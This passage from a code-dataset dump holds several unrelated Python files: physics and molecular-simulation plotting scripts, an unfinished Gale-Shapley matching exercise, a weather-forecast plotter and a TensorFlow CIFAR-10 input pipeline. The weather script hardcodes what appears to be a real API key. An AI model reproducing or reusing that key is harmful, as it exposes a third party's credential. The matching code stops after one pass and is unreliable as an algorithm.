data_exp_m1=[]):\n c03 = TCanvas(\"c03\",\"c03\", 1200, 900)\n gStyle.SetOptStat(0)\n #set_palette()\n #gStyle.SetNumberContours(255)\n #palette = [15, 20, 23, 30, 32]\n gStyle.SetPalette(57)\n gStyle.SetNumberContours(999)\n #gStyle.SetPalette(\"kBird\")\n\n xi = [i for i in range(len(mA_ticks))]\n yi = [i for i in range(len(ma_ticks))]\n \n _year = year\n if _year=='20172018':\n _year = '2017+2018'\n h_col = TH2F(\"h_col\",\"Zprime Baryonic Limit \"+channel+\" \"+_year, len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, 
len(ma_ticks))\n obs = TH2F(\"obs\",\"obs\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n exp = TH2F(\"exp\",\"exp\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n exp_p1 = TH2F(\"exp_p1\",\"exp_p1\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n exp_m1 = TH2F(\"exp_m1\",\"exp_m1\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n data_obs = np.array(data_obs)\n data_exp = np.array(data_exp)\n data_exp_p1 = np.array(data_exp_p1)\n data_exp_m1 = np.array(data_exp_m1)\n \n for i in range(len(mA_ticks)):\n for j in range(len(ma_ticks)):\n mA = i\n ma = j\n #h_col.Fill(mA, ma, round(data_obs[i][j], 3))\n #print mA, ma, data_obs[i][j]\n #obs.Fill(mA, ma, data_obs[i][j])\n h_col.Fill(mA, ma, round(data_exp[i][j],3))\n exp.Fill(mA, ma, round(data_exp[i][j],3))\n exp_p1.Fill(mA, ma, round(data_exp_p1[i][j],3))\n exp_m1.Fill(mA, ma, round(data_exp_m1[i][j],3))\n \n for i in range(len(mA_ticks)):\n h_col.GetXaxis().SetBinLabel(i+1, str(mA_ticks[i]))\n for i in range(len(ma_ticks)):\n h_col.GetYaxis().SetBinLabel(i+1, str(ma_ticks[i]))\n\n\n gPad.SetLogz(1)\n h_col.GetZaxis().SetRangeUser(0.1, 10000);\n h_col.Draw(\"COLZ\")\n # write obs\n # obs.SetMarkerSize(0.9)\n # obs.SetMarkerColor(4)\n # obs.SetBarOffset(0.1)\n # obs.Draw(\"TEXT SAME\")\n # write exp\n exp.SetMarkerSize(0.9)\n exp.SetMarkerColor(1)\n exp.SetBarOffset(-0.1)\n exp.Draw(\"TEXT SAME\")\n # write exp_p1\n exp_p1.SetMarkerSize(0.9)\n exp_p1.SetMarkerColor(2)\n exp_p1.SetBarOffset(0.3)\n exp_p1.Draw(\"TEXT SAME\")\n # write exp_m1\n exp_m1.SetMarkerSize(0.9)\n exp_m1.SetMarkerColor(2)\n exp_m1.SetBarOffset(-0.3)\n exp_m1.Draw(\"TEXT SAME\")\n \n h_col.GetXaxis().SetTitle('m Zp [GeV]')\n h_col.GetYaxis().SetTitle('m Chi [GeV]')\n gPad.SetGrid()\n gPad.SetRightMargin(0.2) \n c03.SaveAs(\"zprimeb_limit_\"+channel+\"_\"+year+\".png\")\n","sub_path":"xtt_datacards_fullrange_zpb/make_2dplot.py","file_name":"make_2dplot.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"560432666","text":"import itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport figstyle\nimport os\n\ndt_scaling = 'log'\ntools = ['piny', 'openmm']\nstep_size = {'0.5': 0.5}\nlabel = {'0.5': '0.5 fs (*)'}\nfor case in ['01', '03', '06', '09', '15', '30', '45', '90']:\n step_size[case] = float(case)\n label[case] = '{} fs'.format(int(case))\n\ndef data(type, timesteps):\n repo = {tool:[] for tool in tools}\n for dt, tool in itertools.product(timesteps, tools):\n file = '{}/results/sinr-{}fs_{}.csv'.format(tool, dt.replace('.', 'p'), type)\n if os.path.isfile(file):\n repo[tool].append(pd.read_csv(file, skipinitialspace=True))\n return repo\n\n# Intermolecular radial distribution functions:\ndef plot_rdfs(timesteps):\n rdf = data('rdf', timesteps)\n fig, ax = plt.subplots(1, 1, figsize=(3.37,2.3))\n fig.suptitle(f'Radial distribution functions (openmm)')\n ax.set_xlabel('Distance (\\\\AA)')\n for dt, gr in zip(timesteps, rdf['openmm']):\n distance = gr['Distance [pm]']/100\n ax.plot(distance, gr['g(r)'], label=label[dt])\n ax.legend(loc='lower right', ncol=2)\n fig.savefig(f'openmm_rdf.png')\n\n# Bond length distributions:\ndef plot_bonds(timesteps):\n bond = data('bond', timesteps)\n for tool in tools:\n fig, ax = plt.subplots(1, 1, figsize=(3.37,2.3), sharex=True)\n fig.suptitle(f'Bond length distributions ({tool})')\n ax.set_xlabel('Distance (\\\\AA)')\n for 
dt, gr in zip(timesteps, bond[tool]):\n distance = gr['# Distance [pm]']/100\n ax.plot(distance, gr['g(r)'], label=label[dt])\n ax.set_ylabel(f'frequency')\n ax.legend(loc='upper left', ncol=1)\n fig.savefig(f'{tool}_bond.png')\n\n# Angle distributions:\ndef plot_angles(timesteps):\n angle = data('angle', timesteps)\n for tool in tools:\n fig, ax = plt.subplots(1, 1, figsize=(3.37,2.3), sharex=True)\n fig.suptitle(f'Angle distributions ({tool})')\n ax.set_xlabel('Angle (\\\\textdegree)')\n for dt, gr in zip(timesteps, angle[tool]):\n distance = gr['# Angle (degree)']\n ax.plot(distance, gr['Occurrence'], label=label[dt])\n ax.set_ylabel(f'frequency')\n ax.legend(loc='upper left', ncol=1)\n fig.savefig(f'{tool}_angle.png')\n\n# Combined bond-angle distributons:\ndef plot_combined(timestep_pairs):\n npairs = len(timestep_pairs)\n for tool in tools:\n fig, ax = plt.subplots(npairs, 1, figsize=(3.37,npairs*2.3), sharex=True)\n if npairs == 1:\n ax = [ax]\n fig.suptitle(f'Combined bond-angle distributions ({tool})')\n ax[-1].set_xlabel('Distance (\\\\AA)')\n for i, timesteps in enumerate(timestep_pairs):\n combined = data('combined', timesteps)\n for dt, gr, style in zip(timesteps, combined[tool], ['solid', 'dashed']):\n X = gr.values[:, 0]/100 # Distances\n Y = np.array([float(y) for y in gr.columns[1:]]) # Angles\n Z = gr.values[:, 1:]\n cs = ax[i].contour(*np.meshgrid(X, Y), Z, linestyles=style)\n cs.collections[0].set_label(label[dt])\n ax[i].set_ylabel('Angle (\\\\textdegree)')\n ax[i].legend(loc='lower left', ncol=1)\n fig.savefig(f'{tool}_combined.png')\n\n# Combined bond-bond distributons:\ndef plot_bond_bond(timestep_pairs):\n npairs = len(timestep_pairs)\n for tool in tools:\n fig, ax = plt.subplots(npairs, 1, figsize=(3.37,npairs*2.3), sharex=True)\n if npairs == 1:\n ax = [ax]\n fig.suptitle(f'Combined bond-bond distributions ({tool})')\n ax[-1].set_xlabel('Distance (\\\\AA)')\n for i, timesteps in enumerate(timestep_pairs):\n combined = data('bbdf', timesteps)\n for dt, gr, style in zip(timesteps, combined[tool], ['solid', 'dashed']):\n X = gr.values[:, 0]/100\n Y = np.array([float(y)/100 for y in gr.columns[1:]])\n Z = gr.values[:, 1:]\n cs = ax[i].contour(*np.meshgrid(X, Y), Z, linestyles=style)\n cs.collections[0].set_label(label[dt])\n ax[i].set_ylabel('Distance (\\\\AA)')\n ax[i].legend(loc='lower left', ncol=1)\n ax[i].set_aspect(1.0)\n fig.savefig(f'{tool}_bond_bond.png')\n\n# Average bonds and angles:\ndef plot_bond_and_angle_averages():\n fig, ax = plt.subplots(2, 1, figsize=(3.37,4.6), sharex=True)\n fig.suptitle(f'Average bond lengths and angles')\n ax[-1].set_xlabel('Time step size (fs)')\n for i, type in enumerate(['bond', 'angle']):\n for tool in tools:\n df = pd.read_csv(f'{tool}/results/{type}_stats.csv')\n dt, mean = df['dt'], df['mean']\n if type == 'bond':\n mean /= 100\n ax[i].plot(dt, mean, marker='o', label=tool)\n ax[i].legend(loc='lower left', ncol=1)\n ax[0].set_xscale(dt_scaling)\n ax[0].set_ylabel('Bond length (\\\\AA)')\n ax[0].legend(loc='upper right', ncol=1, title='$r_0 = 1.012$ \\\\AA')\n ax[1].set_xscale(dt_scaling)\n ax[1].set_ylabel('Angle (\\\\textdegree)')\n ax[1].legend(loc='lower right', ncol=1, title='$\\\\theta_0 = 113.24$\\\\textdegree')\n fig.savefig('average_bonds_and_angles.png')\n\n# Properties:\ndef plot_properties():\n openmm = pd.read_csv('openmm/results/properties.csv')\n piny = pd.read_csv('piny/results/properties.csv')\n\n fig, ax = plt.subplots(2, 1, figsize=(3.37,4.6), sharex=True)\n fig.suptitle(f'Average Properties')\n 
ax[-1].set_xlabel('Time step size (fs)')\n\n Econv = 627.50921*4.184\n\n energy = ax[0]\n energy.set_xscale(dt_scaling)\n energy.set_ylabel('Potential Energy (kJ/mol)')\n # E_lrc = -63.2297879351536\n energy.plot(openmm['dt'], openmm['PotEng'], marker='o', label='openmm')\n energy.plot(piny['dt'], Econv*piny['Etotal'], marker='o', label='piny')\n energy.legend(loc='upper left', ncol=1)\n\n pressure = ax[1]\n pressure.set_xscale(dt_scaling)\n pressure.set_ylabel('Pressure (atm)')\n pressure.plot(openmm['dt'], openmm['Press'], marker='o', label='openmm')\n\n N = 512*3\n V = 24.653**3 # A³\n kB = 8.31451E-7 # Boltzmann constant in Da*A²/(fs²*K)\n Pconv = 1.6388244954E+8 # Da/(A*fs²) to atm\n T = 298.15 # K\n P = piny['Ptotal'] - Pconv*N*kB*(piny['Temp'] - T)/V\n pressure.plot(piny['dt'], P, marker='o', label='piny')\n pressure.legend(loc='upper left', ncol=1)\n\n fig.savefig('average_properties.png')\n\nall = ['0.5', '01', '03', '06', '09', '15', '30', '45', '90']\nplot_rdfs(all)\n# plot_bonds(all)\n# plot_angles(all)\n# plot_combined([('0.5', '90'), ('06', '90')])\n# plot_bond_bond([('0.5', '90'), ('06', '90')])\n# plot_bond_and_angle_averages()\n# plot_properties()\nplt.show()\n","sub_path":"phenol-in-water/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"80068846","text":"import os\nimport numpy\n\nclass Etudiant(object):\n def __init__(self, L):\n self.nom = L[0]\n self.master = L[1:]\n self.libre = True\n\n def __repr__(self):\n return \"Nom : {} \\n master : {} \\n libre : {} \\n\".format(self.nom, self.master,self.libre)\n\n def positionMaster(self, master):\n return self.master.index(master)\n\nclass Master(object):\n def __init__(self,L):\n self.nom = L[0]\n self.listPref = L[1:-1]\n self.capacite = L[-1]\n self.nombreEtudiant = 0\n\n def __repr__(self):\n return \"nom : {} \\n liste de preference {} \\n capacite {} \\n nombre d'etudiant {} \\n\".format(self.nom, self.listPref, self.capacite,self.nombreEtudiant)\n\n\ndef lectureFichier(s):\n os.chdir('fichier_test')\n monFichier = open(s, \"r\") # Ouverture en lecture. 
Indentation par rapport a la ligne d'avant (<-> bloc).\n contenu = monFichier.readlines() # Contenu contient une liste de chainces de caracteres, chaque chaine correspond a une ligne\n monFichier.close() #Fermeture du fichier\n contenu[0]=contenu[0].split() # ligne.split() renvoie une liste de toutes les chaines contenues dans la chaine ligne (separateur=espace)\n os.chdir('..')\n return contenu\n\ndef PrefEtu(fichier):\n s = lectureFichier('TestPrefEtu.txt')\n n = int(s[0][0])\n print(n)\n M = []\n for i in range(1,n+1):\n M.append(s[i].split())\n return M\n\ndef PrefSpe(fichier):\n s = lectureFichier('TestPrefSpe.txt')\n n = int(s[0][1])\n cap = s[1].split()\n M = []\n for i in range(2,n):\n l = s[i].split()\n l.append(cap[i-1])\n M.append(l)\n return M\n\ndef indexMaster(M,master):\n for i in M:\n print(i.nom)\n if i.nom == master:\n return i\n print(\"Master non trouve !\")\n return []\ndef GaleShapley(M1,M2):\n ListeEtudiant = []\n ListeMaster = []\n for i in M1:\n ListeEtudiant.append(Etudiant(i))\n print(ListeEtudiant)\n for i in M2:\n ListeMaster.append(Master(i))\n print(ListeMaster)\n \n etudiant_libre = ListeEtudiant\n while etudiant_libre != []:\n e = etudiant_libre[0]\n master = e.master[0]\n print(\"master de l'etudiant : \",master)\n l = indexMaster(ListeMaster,master)\n print(\"master :\")\n print(l)\n etudiant_libre = []\n \n \n \n\nif __name__ == \"__main__\":\n M1 = PrefEtu('TestPrefEtu.txt')\n M2 = PrefSpe('TestPrefSpe.txt')\n print(M1)\n print(M2)\n GaleShapley(M1,M2)\n","sub_path":"3I025/tme1.py","file_name":"tme1.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"401740914","text":"#!/usr/bin/env python\n#\n# File Name: plot_hourly.py\n# Author: Evan Pete Walsh\n# Contact: epwalsh@iastate.edu\n# Creation Date: 02-12-2015\n# Last Modified: Mon Dec 7 23:41:52 2015\n# =============================================================================\n\n'''Plot some weather conditions as time series.'''\n\nimport urllib2\nimport json\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nkeyID = \"e932b028cad0d3eb\"\n\nf = urllib2.urlopen('http://api.wunderground.com/api/' + keyID +\n '/hourly/q/IA/Ames.json')\njson_string = f.read()\nf.close()\nparsed_json = json.loads(json_string)\n\nhourly_json = parsed_json['hourly_forecast']\n\nhourly = {'time': [],\n 'temp_f': [],\n 'temp_c': [],\n 'temp_feel_f': [],\n 'temp_feel_c': [],\n 'pop': []}\n\nfor hour in hourly_json:\n hourly['time'].append(hour['FCTTIME']['civil'])\n hourly['temp_f'].append(float(hour['temp']['english']))\n hourly['temp_c'].append(float(hour['temp']['metric']))\n hourly['temp_feel_f'].append(float(hour['feelslike']['english']))\n hourly['temp_feel_c'].append(float(hour['feelslike']['metric']))\n hourly['pop'].append(float(hour['pop']))\n\nx_labs = [hourly['time'][i] if i % 2 == 0 else ''\n for i in range(len(hourly['time']))]\n\n\ndef fahrenheit2celsius(temp):\n \"\"\"\n Returns temperature in Celsius.\n \"\"\"\n return (5. / 9.) 
* (temp - 32)\n\ndf = pd.DataFrame(hourly)\n\n# Plot temp, feelslike, and pop as three stacked plots using DataFrame's\n# built-in plot method.\nplots = df.loc[:, ['temp_f', 'pop']].plot(\n subplots=True,\n title=\"Hourly Conditions\",\n figsize=(12, 10))\nplots[1].set_xticks(range(len(x_labs)))\nplots[1].set_xticklabels(x_labs)\n# Temperature plot\nplots[0].set_ylabel('Degrees (f)')\nplots[0].plot(df['temp_feel_f'], linestyle='dashed', label='Feels like',\n color='r')\nplots[0].legend().get_texts()[0].set_text('Temperature')\nplots[0].grid(b=True, which='major')\nplots[0].axhline(y=32, color=\"black\", linewidth=1.5)\nplot2 = plots[0].twinx()\ny1, y2 = plots[0].get_ylim()\nplot2.set_ylim(fahrenheit2celsius(y1), fahrenheit2celsius(y2))\nplot2.set_ylabel('Degrees (c)')\n# Pop plot\nplots[1].legend().get_texts()[0].set_text('Chance of Precipitation')\nplots[1].set_ylabel('%')\nplots[1].grid(b=True, which='major')\n\n# plt.savefig('fig1.jpg')\nplt.show()\n","sub_path":"Python/weatherAlert/plot_hourly.py","file_name":"plot_hourly.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"536263000","text":"import matplotlib.pyplot as plt\r\n\r\n''' this function computes classes of ages from the original dataset '''\r\ndef plot_balancing_original(ages): \r\n #ages = {} # {identity:{jpg:age}}\r\n classes = {}\r\n for id in list(ages.keys()):\r\n for age in ages[id].values():\r\n try:\r\n classes[age] += 1\r\n except:\r\n classes[age] = 1\r\n\r\n return classes\r\n\r\n''' this function computes classes of ages from the selected dataset'''\r\ndef plot_balancing_modified(ages, final_dict):\r\n #final_dict => {identity:[jpgs]}\r\n classes = {}\r\n for id in list(final_dict.keys()):\r\n for jpg in final_dict[id]:\r\n age = ages[id][jpg]\r\n try:\r\n classes[age] += 1\r\n except:\r\n classes[age] = 1\r\n\r\n return classes\r\n\r\n''' this function computes classes of ages from the training set after the split'''\r\ndef after_split_plot(splitted_dict_labels):\r\n # splitted_dict_labels = {} # {id:{\"train\":[ages]}}\r\n classes = {}\r\n for id in list(splitted_dict_labels.keys()):\r\n for age in list(splitted_dict_labels[id][\"train\"]):\r\n try:\r\n classes[age] += 1\r\n except:\r\n classes[age] = 1\r\n \r\n return classes\r\n\r\n''' this function plots the balancing of original, modified and splitted training set'''\r\ndef vs_plot(ages, final_dict, splitted_dict_labels):\r\n classes_orig = plot_balancing_original(ages)\r\n classes_mod = plot_balancing_modified(ages, final_dict)\r\n classes_splitted = after_split_plot(splitted_dict_labels)\r\n\r\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\r\n fig.suptitle(\"CLASSES BALANCE (4 AGE GROUPS)\")\r\n fig.subplots_adjust(hspace=.4)\r\n ax1.bar (classes_orig.keys(), classes_orig.values())\r\n ax1.title.set_text(\"ORIGINAL TS\")\r\n ax1.set_xlabel(\"age classes\")\r\n ax1.set_ylabel(\"number of occurences\")\r\n ax2.bar (classes_mod.keys(), classes_mod.values())\r\n ax2.title.set_text(\"MODIFIED TS\")\r\n ax2.set_xlabel(\"age classes\")\r\n ax2.set_ylabel(\"number of occurences\")\r\n ax3.bar(classes_splitted.keys(), classes_splitted.values())\r\n ax3.title.set_text(\"SPLITTED TS\")\r\n ax3.set_xlabel(\"age classes\")\r\n ax3.set_ylabel(\"number of occurences\")\r\n ax4.axis('off')\r\n
plt.show()","sub_path":"csv_preprocessing/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"365315225","text":"\n\"\"\"Routine for decoding the CIFAR-10 binary file format.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\n#import functions\n\n# Process images of this size. Note that this differs from the original CIFAR\n# image size of 32 x 32. If one alters this number, then the entire model\n# architecture will change and any model would need to be retrained.\n#INPUT_IMAGE_SIZE = 64\n#IMAGE_SIZE = 48\n##For STL-10\n#IMAGE_SIZE = 96\n#INPUT_IMAGE_SIZE = 96\n## For CIFAR-10 (because random 24x24 crops are the way to go)\nIMAGE_SIZE = 24\nINPUT_IMAGE_SIZE = 32\n\n# Global constants describing the CIFAR-10 data set.\nNUM_CLASSES = 10\n## For CIFAR-10 originals\n#NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 50000\n#NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000\n## This is the labelled stl-10 set that I prepared\n#NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 10410\n#NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2590\n\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 350000\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 50000\n\n\ndef read_cifar10(filename_queue):\n \"\"\"Reads and parses examples from CIFAR10 data files.\n\n Recommendation: if you want N-way read parallelism, call this function\n N times. This will give you N independent Readers reading different\n files & positions within those files, which will give better mixing of\n examples.\n\n Args:\n filename_queue: A queue of strings with the filenames to read from.\n\n Returns:\n An object representing a single example, with the following fields:\n height: number of rows in the result (32)\n width: number of columns in the result (32)\n depth: number of color channels in the result (3)\n key: a scalar string Tensor describing the filename & record number\n for this example.\n label: an int32 Tensor with the label in the range 0..9.\n uint8image: a [height, width, depth] uint8 Tensor with the image data\n \"\"\"\n\n class CIFAR10Record(object):\n pass\n result = CIFAR10Record()\n\n # Dimensions of the images in the CIFAR-10 dataset.\n # See http://www.cs.toronto.edu/~kriz/cifar.html for a description of the input format.\n label_bytes = 1 # 2 for CIFAR-100\n result.height = INPUT_IMAGE_SIZE\n result.width = INPUT_IMAGE_SIZE\n result.depth = 3\n image_bytes = result.height * result.width * result.depth\n # Every record consists of a label followed by the image, with a\n # fixed number of bytes for each.\n record_bytes = label_bytes + image_bytes\n\n # Read a record, getting filenames from the filename_queue. No\n # header or footer in the CIFAR-10 format, so we leave header_bytes\n # and footer_bytes at their default of 0.\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)\n result.key, value = reader.read(filename_queue)\n\n #print(\"The value from reading: {} \\n\".format(value))\n\n # Convert from a string to a vector of uint8 that is record_bytes long.\n record_bytes = tf.decode_raw(value, tf.uint8)\n \n #print(record_bytes)\n\n # The first bytes represent the label, which we convert from uint8->int32.\n result.label = tf.cast(tf.slice(record_bytes, [0], [label_bytes]), tf.int32)\n\n # The STL labels run from 1-10 will this make a difference? 
Better to normalise just in case...\n #result.label = result.label - 1\n #print(\"Here is the label: {}, hooray!\".format(result.label))\n\n # The remaining bytes after the label represent the image, which we reshape\n # from [depth * height * width] to [depth, height, width].\n depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]),\n [result.depth, result.height, result.width])\n # Convert from [depth, height, width] to [height, width, depth].\n result.uint8image = tf.transpose(depth_major, [1, 2, 0])\n\n return result\n\n\n\ndef _generate_image_and_label_batch(image, label, min_queue_examples,\n batch_size, shuffle):\n \"\"\"Construct a queued batch of images and labels.\n\n Args:\n image: 3-D Tensor of [height, width, 3] of type.float32.\n label: 1-D Tensor of type.int32\n min_queue_examples: int32, minimum number of samples to retain\n in the queue that provides batches of examples.\n batch_size: Number of images per batch.\n shuffle: boolean indicating whether to use a shuffling queue.\n\n Returns:\n images: Images. 4D tensor of [batch_size, height, width, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n # Create a queue that shuffles the examples, and then\n # read 'batch_size' images + labels from the example queue.\n num_preprocess_threads = 16\n if shuffle:\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size,\n min_after_dequeue=min_queue_examples)\n else:\n images, label_batch = tf.train.batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size)\n\n # Display the training images in the visualizer.\n tf.image_summary('images', images)\n\n return images, tf.reshape(label_batch, [batch_size])\n\n\ndef distorted_inputs(data_dir, batch_size):\n \"\"\"Construct distorted input for CIFAR training using the Reader ops.\n\n Args:\n data_dir: Path to the CIFAR-10 data directory.\n batch_size: Number of images per batch.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n # for CIFAR-10\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n # for MNIST\n filenames = [os.path.join(data_dir, 'train-images-idx3-ubyte.bin'),]\n # for STL-10\n filenames = [os.path.join(data_dir, 'train_X.bin'),]\n # for CIFAR-10_munge (which is my munged together dataset)\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 26)]\n\n\n for f in filenames:\n if not tf.gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n\n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer(filenames)\n\n # Read examples from files in the filename queue.\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n\n # Image processing for training the network.
Note the many random\n # distortions applied to the image.\n\n # Randomly crop a [height, width] section of the image.\n distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n\n # Randomly flip the image horizontally.\n distorted_image = tf.image.random_flip_left_right(distorted_image)\n\n # Because these operations are not commutative, consider randomizing\n # the order of their operation.\n distorted_image = tf.image.random_brightness(distorted_image, max_delta=63)\n distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8)\n\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_whitening(distorted_image)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN * min_fraction_of_examples_in_queue)\n print ('Filling queue with %d images before starting to train. ' 'This will take a few minutes.' % min_queue_examples)\n\n # Generate a batch of images and labels by building up a queue of examples.\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size,\n shuffle=True)\n\n\ndef distorted_inputs_noAugmentation(data_dir, batch_size):\n \"\"\"Construct distorted input for CIFAR training using the Reader ops.\n\n Args:\n data_dir: Path to the CIFAR-10 data directory.\n batch_size: Number of images per batch.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n # for MNIST\n filenames = [os.path.join(data_dir, 'train-images-idx3-ubyte.bin'),]\n # for STL-10\n filenames = [os.path.join(data_dir, 'train_X.bin'),]\n\n for f in filenames:\n if not tf.gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n \n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer(filenames)\n\n # Read examples from files in the filename queue.\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n #switch to using yuv\n #print(\"The shape: {}.\".format(tf.shape(reshaped_image)))\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n\n # Image processing for training the network.
Note the many random\n # distortions applied to the image.\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n #Just a center crop in the first instance - to maximise reproducibility...\n distorted_image = tf.image.resize_image_with_crop_or_pad(reshaped_image, width, height)\n #convert to rgb...\n #distorted_image = functions.planarYUV_2_planarRGB_areadyshaped(distorted_image)\n \n # Randomly crop a [height, width] section of the image.\n #distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n #print(tf.shape(distorted_image))\n\n # Randomly flip the image horizontally.\n #distorted_image = tf.image.random_flip_left_right(distorted_image)\n\n # Because these operations are not commutative, consider randomizing\n # the order of their operation.\n # PAJ: Taking these out for now.\n #distorted_image = tf.image.random_brightness(distorted_image, max_delta=63)\n #distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8)\n\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_whitening(distorted_image)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN * min_fraction_of_examples_in_queue)\n print ('Filling queue with %d CIFAR images before starting to train. '\n 'This will take a few minutes.' % min_queue_examples)\n\n # Generate a batch of images and labels by building up a queue of examples.\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size,\n shuffle=True)\n\n\ndef inputs(eval_data, data_dir, batch_size):\n \"\"\"Construct input for CIFAR evaluation using the Reader ops.\n\n Args:\n eval_data: bool, indicating if one should use the train or eval data set.\n data_dir: Path to the CIFAR-10 data directory.\n batch_size: Number of images per batch.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n labels: Labels.
1D tensor of [batch_size] size.\n \"\"\"\n if not eval_data:\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n # for MNIST\n filenames = [os.path.join(data_dir, 'train-images-idx3-ubyte.bin'), ]\n # for STL-10\n filenames = [os.path.join(data_dir, 'train_X.bin'), ]\n num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN\n\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n else:\n filenames = [os.path.join(data_dir, 'test_batch.bin')]\n #for MNIST\n filenames = [os.path.join(data_dir, 't10k-images-idx3-ubyte.bin')]\n # for STL-10\n filenames = [os.path.join(data_dir, 'test_X.bin'), ]\n num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL\n filenames = [os.path.join(data_dir, 'test_batch.bin')]\n\n for f in filenames:\n if not tf.gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n\n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer(filenames)\n\n # Read examples from files in the filename queue.\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n\n # Image processing for evaluation.\n # Crop the central [height, width] of the image.\n resized_image = tf.image.resize_image_with_crop_or_pad(reshaped_image,\n width, height)\n\n #resized_image = functions.planarYUV_2_planarRGB_areadyshaped(resized_image)\n\n\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_whitening(resized_image)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(num_examples_per_epoch *\n min_fraction_of_examples_in_queue)\n\n # Generate a batch of images and labels by building up a queue of examples.\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size,\n shuffle=False)\n","sub_path":"cifar10_input.py","file_name":"cifar10_input.py","file_ext":"py","file_size_in_byte":13369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"530842061","text":"import os\n\nimport pytest\n\nfrom ..emulators import EmulatorWrapper\n\nSELECTED_GENS = [\n gen.strip() for gen in os.environ.get(\"TREZOR_UPGRADE_TEST\", \"\").split(\",\") if gen\n]\n\nif SELECTED_GENS:\n # if any gens were selected via the environment variable, force enable all selected\n LEGACY_ENABLED = 